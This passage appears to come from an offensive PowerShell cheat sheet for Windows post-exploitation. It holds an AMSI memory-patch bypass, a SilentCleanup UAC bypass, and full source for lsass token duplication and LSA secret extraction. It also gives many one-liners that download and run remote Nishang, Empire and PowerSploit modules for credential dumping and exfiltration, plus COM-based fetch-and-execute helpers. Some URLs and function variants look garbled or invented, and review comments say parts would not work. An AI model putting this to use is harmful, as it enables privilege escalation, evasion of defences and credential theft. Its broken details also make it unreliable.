Byte[] Patch = {c1, 0x57, 0x00, 0x07, c2, 0xC3 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
Marshal.Copy(Patch, 0, unmanagedPointer, 6);
MoveMemory(Address, unmanagedPointer, 6);
return 0;
}
}
}
`" @;
Add-Type -ReferencedAssemblies `$ Ref -TypeDefinition `$ Source -Language CSharp;
iex "[Bypass$id .AMSI$id ]::Disable() | Out-Null"
}
"@ ;
iex @"
function Invoke-Bypass-$id -UACSilentCleanup {
# (Add-Type writes *.cs on disk!!)
# https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html
Param(
[Parameter(Mandatory=`$ True,HelpMessage="Enter command to execute.")]
`$ Command
)
`$ Source = @"
using System;
using Microsoft.Win32;
using System.Diagnostics;
namespace UACBypass
{
public class SilentCleanup$id
{
public static void exec(string payload)
{
// Payload to be executed
Console.WriteLine("[+] Starting Bypass UAC.");
try
{
// Registry Key Modification
RegistryKey key;
key = Registry.CurrentUser.CreateSubKey(@"Environment");
key.SetValue("windir", "cmd.exe /c " + payload + " & ", RegistryValueKind.String);
key.Close();
Console.WriteLine("[+] Enviroment Variabled %windir% Created.");
}
catch
{
Console.WriteLine("[-] Unable to Create the Enviroment Variabled %windir%.");
Console.WriteLine("[-] Exit.");
}
//Wait 5 sec before execution
Console.WriteLine("[+] Waiting 5 seconds before execution.");
System.Threading.Thread.Sleep(5000);
// Trigger the UAC Bypass
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
startInfo.FileName = "schtasks.exe";
startInfo.Arguments = @"/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I";
Process.Start(startInfo);
Console.WriteLine("[+] UAC Bypass Application Executed.");
}
catch
{
Console.WriteLine("[-] Unable to Execute the Application schtasks.exe to perform the bypass.");
}
//Clean Registry
DeleteKey();
Console.WriteLine("[-] Exit.");
}
static void DeleteKey()
{
//Wait 5 sec before cleaning
Console.WriteLine("[+] Registry Cleaning will start in 5 seconds.");
System.Threading.Thread.Sleep(5000);
try
{
var rkey = Registry.CurrentUser.OpenSubKey(@"Environment", true);
// Validate if the Key Exist
if (rkey != null)
{
try
{
rkey.DeleteValue("windir");
rkey.Close();
}
catch (Exception err)
{
Console.WriteLine(@"[-] Unable to Delete the Registry key (Environment). Error " + err.Message);
}
}
Console.WriteLine("[+] Registry Cleaned.");
}
catch
{
Console.WriteLine("[-] Unable to Clean the Registry.");
}
}
}
}
`" @;
Add-Type -TypeDefinition `$ Source -Language CSharp;
iex "[UACBypass.SilentCleanup$id ]::exec(```$ Command) | Out-Null"
}
"@ ;
function Invoke-AMSI {
# Probe whether AMSI scanning is active: submit a small test buffer and print
# "AMSI is enabled" / "AMSI is disabled" depending on the returned code.
# NOTE(review): AmsiClient/GetAmsiClient and a public amsiScanBuffer are not part of
# the documented System.Management.Automation surface; as written this most likely
# throws before reaching the if/else, so neither message is printed — confirm.
# $amsmodule is assigned but never read; LoadWithPartialName is obsolete and returns
# $null when the assembly is not found.
$amsmodule = [System.Reflection.Assembly ]::LoadWithPartialName(" System.Management.Automation.Amsi" )
$amsi = [System.Management.Automation.AmsiClient ]::GetAmsiClient()
# Scan the UTF-16 bytes of "test", tagged with content type "Script".
$amsiScan = [System.Management.Automation.AmsiUtils ]::amsiScanBuffer($amsi , [System.Text.Encoding ]::Unicode.GetBytes(" test" ), " Script" , 0 )
# Only a result of exactly 1 is reported as "enabled"; every other value falls through to "disabled".
if ($amsiScan -eq 1 ) {
Write-Host " AMSI is enabled"
}
else {
Write-Host " AMSI is disabled"
}
}
Invoke-AMSI
function Invoke-AmsiBypass {
# Despite the name, this block does not disable or patch anything: it reflectively looks
# up the non-public static AmsiUtils scan method and invokes a scan of a test buffer, so the
# content it submits ('test') is still scanned normally.
# NOTE(review): Invoke-AMSI above passes four arguments to amsiScanBuffer while this passes
# two; at least one of the two call shapes is wrong, and Invoke will most likely throw a
# parameter-count error — confirm against the target PowerShell version.
# If LoadWithPartialName returns $null (assembly not found), the GetType call on the next
# line fails before any reflection happens.
$amsi = [Reflection.Assembly ]::LoadWithPartialName(' System.Management.Automation.Amsi' )
$amsiScan = $amsi.GetType (' System.Management.Automation.AmsiUtils' ).GetMethod(' amsiScanBuffer' , [Reflection.BindingFlags ] ' NonPublic, Static' )
$amsiScan.Invoke ($null , @ ([System.Text.Encoding ]::Unicode.GetBytes(' test' ), ' AMSI::amsiScanBuffer()' ))
}
Invoke-AmsiBypass
Invoke-AmsiBypass (Nishang)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Bypass/Invoke-AmsiBypass.ps1');Invoke-AmsiBypass -Verbose;
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/danielbohannon/Invoke-Obfuscation/master/Invoke-Obfuscation.ps1' ); Invoke-Obfuscation - Command " Get-Process" - Verbose
Invoke-MimikatzWDigestDowngrade
# LOCAL
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShell/PowerShell/refs/heads/master/docs/firstSteps/Invoke-MimikatzWDigestDowngrade.ps1' );Invoke-MimikatzWDigestDowngrade ; Get-Job | Receive-Job
# RDP
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShell/PowerShell/refs/heads/master/docs/firstSteps/Invoke-MimikatzWDigestDowngrade.ps1' );Invoke-MimikatzWDigestDowngrade - RDP
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1' ); Invoke-MimikatzWDigestDowngrade - RDP
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/master/Privesc/Invoke-PS3Shell.ps1' ); Invoke-PS3Shell
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-CredentialDump.ps1' ); Invoke-CredentialDump
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Invoke-PsUACme.ps1' ); Invoke-PsUACme - Verbose; Invoke-PsUACme - Method AutoElevate
SYNOPSIS:
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
DESCRIPTION:
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
AUTHOR:
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang
EXAMPLE:
PS > Enable-DuplicateToken
CODE:
[CmdletBinding ()]
param ()
$signature = @"
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const int TOKEN_QUERY = 0x00000008;
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
public const int ANYSIZE_ARRAY = 1;
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES {
public LUID Luid;
public UInt32 Attributes;
}
public struct TOKEN_PRIVILEGES {
public UInt32 PrivilegeCount;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
public LUID_AND_ATTRIBUTES [] Privileges;
}
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadToken(
IntPtr PHThread,
IntPtr Token
);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
[DllImport("kernel32.dll", ExactSpelling = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity ]::GetCurrent())
if ($currentPrincipal.IsInRole ([Security.Principal.WindowsBuiltInRole ]::Administrator) -ne $true ) {
Write-Warning " Run the Command as an Administrator"
Break
}
Add-Type - MemberDefinition $signature - Name AdjPriv - Namespace AdjPriv
$adjPriv = [AdjPriv.AdjPriv ]
[long ]$luid = 0
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+ TokPriv1Luid
$tokPriv1Luid.Count = 1
$tokPriv1Luid.Luid = $luid
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv ]::SE_PRIVILEGE_ENABLED
$retVal = $adjPriv ::LookupPrivilegeValue($null , " SeDebugPrivilege" , [ref ]$tokPriv1Luid.Luid )
[IntPtr ]$htoken = [IntPtr ]::Zero
$retVal = $adjPriv ::OpenProcessToken($adjPriv ::GetCurrentProcess(), [AdjPriv.AdjPriv ]::TOKEN_ALL_ACCESS, [ref ]$htoken )
$tokenPrivileges = New-Object AdjPriv.AdjPriv+ TOKEN_PRIVILEGES
$retVal = $adjPriv ::AdjustTokenPrivileges($htoken , $false , [ref ]$tokPriv1Luid , 12 , [IntPtr ]::Zero, [IntPtr ]::Zero)
if (-not ($retVal )) {
[System.Runtime.InteropServices.marshal ]::GetLastWin32Error()
Break
}
$process = (Get-Process - Name lsass)
# $process.name
[IntPtr ]$hlsasstoken = [IntPtr ]::Zero
$retVal = $adjPriv ::OpenProcessToken($process.Handle , ([AdjPriv.AdjPriv ]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv ]::TOKEN_DUPLICATE), [ref ]$hlsasstoken )
[IntPtr ]$dulicateTokenHandle = [IntPtr ]::Zero
$retVal = $adjPriv ::DuplicateToken($hlsasstoken , 2 , [ref ]$dulicateTokenHandle )
$retval = $adjPriv ::SetThreadToken([IntPtr ]::Zero, $dulicateTokenHandle )
if (-not ($retVal )) {
[System.Runtime.InteropServices.marshal ]::GetLastWin32Error()
}
Enable-DuplicateToken from GitHub
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Enable-DuplicateToken.ps1' ); Enable-DuplicateToken
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Disable-DuplicateToken.ps1' ); Disable-DuplicateToken
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Invoke-TokenManipulation.ps1' ); Invoke-TokenManipulation - Username " Administrator" - ImpersonateUser
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Escalation/Invoke-TokenDuplication.ps1' ); Invoke-TokenDuplication - ProcessID 1234
SYNOPSIS:
Nishang script which extracts LSA Secrets from the local computer.
DESCRIPTION:
Extracts LSA secrets from HKLM:\SECURITY\Policy\Secrets\ on a local computer.
The payload must be run with elevated permissions, in 32-bit mode, and requires
permissions on the SECURITY key in HKLM. Those permissions can be obtained by using the
Enable-DuplicateToken payload.
AUTHOR:
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
https://github.com/samratashok/nishang
EXAMPLE:
PS > Enable-DuplicateToken
PS > Get-LsaSecret
PS > Enable-DuplicateToken
PS > Get-LsaSecret - RegistryKey KeyName
CODE:
function Get-LsaSecret {
[CmdletBinding ()] Param (
[Parameter (Position = 0 , Mandatory = $False )]
[String ]
$RegistryKey
)
Begin {
# Check if User is Elevated
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity ]::GetCurrent())
if ($currentPrincipal.IsInRole ([Security.Principal.WindowsBuiltInRole ]::Administrator) -ne $true ) {
Write-Warning " Run the Command as an Administrator"
Break
}
# Check if Script is run in a 32-bit Environment by checking a Pointer Size
if ([System.IntPtr ]::Size -eq 8 ) {
Write-Warning " Run PowerShell in 32-bit mode"
Break
}
# Check if RegKey is specified
if ([string ]::IsNullOrEmpty($registryKey )) {
[string []]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select - ExpandProperty Name) - Leaf)
}
# Create Temporary Registry Key
if ( -not (Test-Path " HKLM:\\SECURITY\Policy\Secrets\MySecret" )) {
mkdir " HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
}
$signature = @"
[StructLayout(LayoutKind.Sequential)]
public struct LSA_UNICODE_STRING
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Sequential)]
public struct LSA_OBJECT_ATTRIBUTES
{
public int Length;
public IntPtr RootDirectory;
public LSA_UNICODE_STRING ObjectName;
public uint Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
public enum LSA_AccessPolicy : long
{
POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
POLICY_TRUST_ADMIN = 0x00000008L,
POLICY_CREATE_ACCOUNT = 0x00000010L,
POLICY_CREATE_SECRET = 0x00000020L,
POLICY_CREATE_PRIVILEGE = 0x00000040L,
POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
POLICY_SERVER_ADMIN = 0x00000400L,
POLICY_LOOKUP_NAMES = 0x00000800L,
POLICY_NOTIFICATION = 0x00001000L
}
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaRetrievePrivateData(
IntPtr PolicyHandle,
ref LSA_UNICODE_STRING KeyName,
out IntPtr PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaStorePrivateData(
IntPtr policyHandle,
ref LSA_UNICODE_STRING KeyName,
ref LSA_UNICODE_STRING PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaOpenPolicy(
ref LSA_UNICODE_STRING SystemName,
ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
uint DesiredAccess,
out IntPtr PolicyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaNtStatusToWinError(
uint status
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaClose(
IntPtr policyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaFreeMemory(
IntPtr buffer
);
"@
Add-Type - MemberDefinition $signature - Name LSAUtil - Namespace LSAUtil
}
Process {
foreach ($key in $RegistryKey ) {
$regPath = " HKLM:\\SECURITY\Policy\Secrets\" + $key
$tempRegPath = " HKLM:\\SECURITY\Policy\Secrets\MySecret"
$myKey = " MySecret"
if (Test-Path $regPath ) {
Try {
Get-ChildItem $regPath - ErrorAction Stop | Out-Null
}
Catch {
Write-Error - Message " Access to registry Denied, run as NT AUTHORITY\SYSTEM" - Category PermissionDenied
Break
}
if (Test-Path $regPath ) {
# Copy Key
" CurrVal" , " OldVal" , " OupdTime" , " CupdTime" , " SecDesc" | ForEach-Object {
$copyFrom = " HKLM:\SECURITY\Policy\Secrets\" + $key + " \" + $_
$copyTo = " HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_
if ( -not (Test-Path $copyTo ) ) {
mkdir $copyTo | Out-Null
}
$item = Get-ItemProperty $copyFrom
Set-ItemProperty - Path $copyTo - Name ' (default)' - Value $item .' (default)'
}
}
$Script :pastevalue
# Attributes
$objectAttributes = New-Object LSAUtil.LSAUtil+ LSA_OBJECT_ATTRIBUTES
$objectAttributes.Length = 0
$objectAttributes.RootDirectory = [IntPtr ]::Zero
$objectAttributes.Attributes = 0
$objectAttributes.SecurityDescriptor = [IntPtr ]::Zero
$objectAttributes.SecurityQualityOfService = [IntPtr ]::Zero
# localSystem
$localsystem = New-Object LSAUtil.LSAUtil+ LSA_UNICODE_STRING
$localsystem.Buffer = [IntPtr ]::Zero
$localsystem.Length = 0
$localsystem.MaximumLength = 0
# Secret Name
$secretName = New-Object LSAUtil.LSAUtil+ LSA_UNICODE_STRING
$secretName.Buffer = [System.Runtime.InteropServices.Marshal ]::StringToHGlobalUni($myKey )
$secretName.Length = [Uint16 ]($myKey.Length * [System.Text.UnicodeEncoding ]::CharSize)
$secretName.MaximumLength = [Uint16 ](($myKey.Length + 1 ) * [System.Text.UnicodeEncoding ]::CharSize)
# Get LSA PolicyHandle
$lsaPolicyHandle = [IntPtr ]::Zero
[LSAUtil.LSAUtil + LSA _AccessPolicy ]$access = [LSAUtil.LSAUtil + LSA _AccessPolicy ]::POLICY_GET_PRIVATE_INFORMATION
$lsaOpenPolicyHandle = [LSAUtil.LSAUtil ]::LSAOpenPolicy([ref ]$localSystem , [ref ]$objectAttributes , $access , [ref ]$lsaPolicyHandle )
if ($lsaOpenPolicyHandle -ne 0 ) {
Write-Warning " lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle "
Continue
}
# Retrieve Private Data
$privateData = [IntPtr ]::Zero
$ntsResult = [LSAUtil.LSAUtil ]::LsaRetrievePrivateData($lsaPolicyHandle , [ref ]$secretName , [ref ]$privateData )
$lsaClose = [LSAUtil.LSAUtil ]::LsaClose($lsaPolicyHandle )
$lsaNtStatusToWinError = [LSAUtil.LSAUtil ]::LsaNtStatusToWinError($ntsResult )
if ($lsaNtStatusToWinError -ne 0 ) {
Write-Warning " lsaNtsStatusToWinError: $lsaNtStatusToWinError "
}
[LSAUtil.LSAUtil + LSA _UNICODE _STRING ]$lusSecretData =
[LSAUtil.LSAUtil + LSA _UNICODE _STRING ][System.Runtime.InteropServices.marshal ]::PtrToStructure($privateData , [System.Type ][LSAUtil.LSAUtil + LSA _UNICODE _STRING ])
Try {
[string ]$value = [System.Runtime.InteropServices.marshal ]::PtrToStringAuto($lusSecretData.Buffer )
$value = $value.SubString (0 , ($lusSecretData.Length / 2 ))
}
Catch {
$value = " "
}
if ($key -match " ^_SC_" ) {
# Get Service Account
$serviceName = $key -Replace " ^_SC_"
Try {
# Get Service Account
$service = Get-WmiObject - Query " SELECT StartName FROM Win32_Service WHERE Name = '$serviceName '" - ErrorAction Stop
$account = $service.StartName
}
Catch {
$account = " "
}
} else {
$account = " "
}
# Return Object
$obj = New-Object PSObject - Property @ {
Name = $key ;
Secret = $value ;
Account = $Account
}
$obj | Select-Object Name, Account, Secret, @ {Name = " ComputerName" ;Expression = {$env: COMPUTERNAME }}
}
else {
Write-Error - Message " Path not found: $regPath " - Category ObjectNotFound
}
}
}
end {
if (Test-Path $tempRegPath ) {
Remove-Item - Path " HKLM:\\SECURITY\Policy\Secrets\MySecret" - Recurse - Force
}
}
}
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSAKey.ps1' ); Get-LSAKey - Key " MySecret"
Get-LsaSecret from GitHub
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LsaSecret.ps1' ); Get-LsaSecret - SecretName " SecretName"
https:// raw.githubusercontent.com / samratashok/ nishang/ refs/ heads/ master/ Gather/ Get-LSASeal.ps1
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName"
Get-LSASeal from Github (with password)
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName" - Password " password"
Get-LSASeal from Github (with password and username)
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username"
Get-LSASeal from Github (with password and username and domain)
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain"
Get-LSASeal from Github (with password and username and domain and computername)
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" - ComputerName " computername"
Get-LSASeal from Github (with password and username and domain and computername and lsafile)
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" - ComputerName " computername" - LsaFile " lsafile"
Get-LSASeal from Github (with password and username and domain and computername and lsafile and log)
IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Gather/Get-LSASeal.ps1' ); Get-LSASeal - SecretName " SecretName" - Password " password" - Username " username" - Domain " domain" - ComputerName " computername" - LsaFile " lsafile" - Log " log"
https:// raw.githubusercontent.com / samratashok/ nishang/ refs/ heads/ master/ Utility/ Out-DnsTxt.ps1
https:// raw.githubusercontent.com / BC- SECURITY/ Empire/ master/ data / module_source/ exfiltration/ Invoke-DNSExfiltration.ps1
https:// raw.githubusercontent.com / BC- SECURITY/ Empire/ master/ data / module_source/ exfiltration/ Invoke-PSOutlook.ps1
# Recommend Get-WmiObject
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-WmiObject.ps1 );Get-WmiObject
# Recommend Get-WmiObjectProperty
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-WmiObjectProperty.ps1 );Get-WmiObjectProperty
# Not recommend Get-WmiObjectProperty
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-WmiObjectProperty.ps1 );Get-WmiObjectProperty
# Recommend Get-WmiObjectMethod
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-WmiObjectMethod.ps1 );Get-WmiObjectMethod
# Recommend Invoke-WmiMethod
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Invoke-WmiMethod.ps1 );Invoke-WmiMethod
# Recommend Invoke-WmiMethodProperty
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Invoke-WmiMethodProperty.ps1 );Invoke-WmiMethodProperty
# Recommend Invoke-WmiMethodProperty
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Invoke-WmiMethodProperty.ps1 );Invoke-WmiMethodProperty
# Recommend Get-ComObject
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObject.ps1 );Get-ComObject
# ### Get-ComObjectProperty
`` ` powershell
# Recommend Get-ComObjectProperty
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObjectProperty.ps1 );Get-ComObjectProperty
# Not recommend Get-ComObjectProperty
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Recon/ Get-ComObjectProperty.ps1 );Get-ComObjectProperty
# Recommend Get-ComObjectMethod
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObjectMethod.ps1 );Get-ComObjectMethod
# Recommend Get-ComObjectMethodArgs
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ Get-ComObjectMethodArgs.ps1 );Get-ComObjectMethodArgs
iex (iwr https:// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ credentials/ COM- Utility.ps1);COM- Utility
Invoke-COM-ShellApplication
function Invoke-COM-ShellApplication {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument
)
BEGIN {
$GUID = " 13709620-C279-11CE-A49E-444553540000"
Write-Output " [+] Executing ShellApplication COM object"
}
PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.ShellExecute ($Command , $Argument , " " , " " , 0 )
}
END {
Write-Output " [+] Process Completed"
}
}
function Invoke-COM-ProcessChain {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument
)
BEGIN {
$GUID = " E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"
Write-Output " [+] Executing ProcessChain COM object"
}
PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.ExecutablePath = $Command
$Instance.CommandLine = $Argument
$Instance.Start ([ref ]$True )
}
END {
Write-Output " [+] Process Completed"
}
}
function Invoke-COM-WindowsScriptHost {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument
)
BEGIN {
$GUID = " F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
Write-Output " [+] Executing WindowsScriptHost COM object"
}
PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.Run ($Command + " " + $Argument )
}
END {
Write-Output " [+] Process Completed"
}
}
function Invoke-COM-ShellBrowserWindow {
param (
[Parameter (Mandatory = $True )]
[string ]$Command
)
BEGIN {
$GUID = " C08AFD90-F2A1-11D1-8455-00A0C91F3880"
Write-Output " [+] Executing ShellBrowserWindow COM object"
}
PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
$Instance.Navigate ($Command )
}
END {
Write-Output " [+] Process Completed"
}
}
function Invoke-COM-XMLHTTP {
# Fetch $Path with a synchronous GET through a COM XMLHTTP instance (created by CLSID) and
# return the response body as text. With -Execute, the body is also handed to IEX before
# it is returned.
# NOTE(review): the BEGIN/END banners are written with Write-Output, so they share the
# success stream with the returned body — a caller doing `$x = Invoke-COM-XMLHTTP ...`
# receives an array of banner strings plus the body, not the body alone.
# NOTE(review): nothing between Send() and IEX checks the response status or the
# integrity/origin of the content; whatever the server returns is what runs.
param (
[Parameter (Mandatory = $True )]
[string ]$Path ,
[Parameter (Mandatory = $False )]
[switch ]$Execute = $False
)
BEGIN {
$GUID = " F5078F35-C551-11D3-89B9-0000F81FE221"
Write-Output " [+] Executing XML HTTP COM object"
}
PROCESS {
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromCLSID($GUID ))
# Third argument is the async flag; $False makes Send() block until the response arrives.
$Instance.Open (" GET" , $Path , $False )
$Instance.Send ()
$Data = $Instance.responseText
if ($Execute ) {
IEX $Data
}
return $Data
}
END {
Write-Output " [+] Process Completed"
}
}
function Invoke-COM-ScheduleService {
param (
[Parameter (Mandatory = $True )]
[string ]$Command ,
[Parameter (Mandatory = $True )]
[string ]$Argument ,
[Parameter (Mandatory = $False )]
[int ]$Delay = 30
)
BEGIN {
$ProgID = " Schedule.Service"
$TaskName = [Guid ]::NewGuid().ToString()
Write-Output " [+] Executing ScheduleService COM object"
Write-Output " [+] Task name $ ( $TaskName ) "
}
PROCESS {
$TaskName = [Guid ]::NewGuid().ToString()
$Instance = [activator ]::CreateInstance([type ]::GetTypeFromProgID($ProgID ))
$Instance.Connect ()
$Folder = $Instance.GetFolder (" \" )
$Task = $Instance.NewTask (0 )
$Trigger = $Task.triggers.Create (0 )
$Trigger.StartBoundary = Convert-Date - Date ((Get-Date ).addSeconds($Delay ))
$Trigger.EndBoundary = Convert-Date - Date ((Get-Date ).addSeconds($Delay + (60 * 60 )))
$Trigger.ExecutionTimelimit = " PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $Taskname
